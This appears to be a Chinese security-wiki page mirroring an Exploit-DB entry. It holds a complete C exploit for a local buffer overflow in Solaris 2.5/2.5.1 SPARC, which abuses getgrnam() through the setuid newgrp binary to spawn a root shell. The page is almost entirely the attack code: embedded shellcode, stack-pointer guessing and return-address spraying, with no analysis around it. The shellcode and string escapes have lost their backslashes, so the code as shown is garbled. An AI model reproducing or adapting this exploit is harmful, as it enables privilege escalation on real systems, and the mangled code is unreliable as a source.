Solaris 2.5/2.5.1 – ‘getgrnam()’ Local Overflow-安全小百科

Solaris 2.5/2.5.1 – ‘getgrnam()’ Local Overflow

漏洞ID	1053513	漏洞类型
发布时间	2001-01-13	更新时间	2001-01-13
CVE编号	N/A	CNNVD-ID	N/A
漏洞平台	Solaris	CVSS评分	N/A

|漏洞来源

https://www.exploit-db.com/exploits/247

|漏洞详情

漏洞细节尚未披露

|漏洞EXP

#include <stdio.h>
#include <sys/types.h>

/*
   getgrnam() function overflow.

   works against Solaris 2.5/2.5.1 (SPARC)
   default offset should work.

   Pablo Sor, Buenos Aires, Argentina.
   [email protected]

*/

u_char shell[] =
  "x82x10x20xcaxa6x1cxc0x13x90x0cxc0x13x92x0cxc0x13"
  "xa6x04xe0x01x91xd4xffxffx2dx0bxd8x9axacx15xa1x6e"
  "x2fx0bxdcxdax90x0bx80x0ex92x03xa0x08x94x1ax80x0a"
  "x9cx03xa0x10xecx3bxbfxf0xdcx23xbfxf8xc0x23xbfxfc"
  "x82x10x20x3bx91xd4xffxff";

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 n");
}

void main()
{
  long *p;
  long addr;
  char buf[8300];
  int i;

  addr = get_sp()-8096;
  printf("Jumping to address %pn",addr);
  p = (long *) buf;
  for (i=0;i<2050;++i) *(p++) = 0xa61cc013;
  for (i=0;i<strlen(shell);++i) buf[104+i] = shell[i];
  p = (long *) &buf[8160];
  for (i=0;i<30;++i) *(p++) = addr;
  buf[8280]=0;
  execl("/usr/bin/newgrp","newgrp",buf,(char *)0);
}


// milw0rm.com [2001-01-13]

相关推荐: OpenSSL Unseeded Random Number Generator Vulnerability

OpenSSL Unseeded Random Number Generator Vulnerability 漏洞ID 1104251 漏洞类型 Design Error 发布时间 2000-02-28 更新时间 2000-02-28 CVE编号 N/A CN…

文章版权归作者所有，未经允许请勿转载。

THE END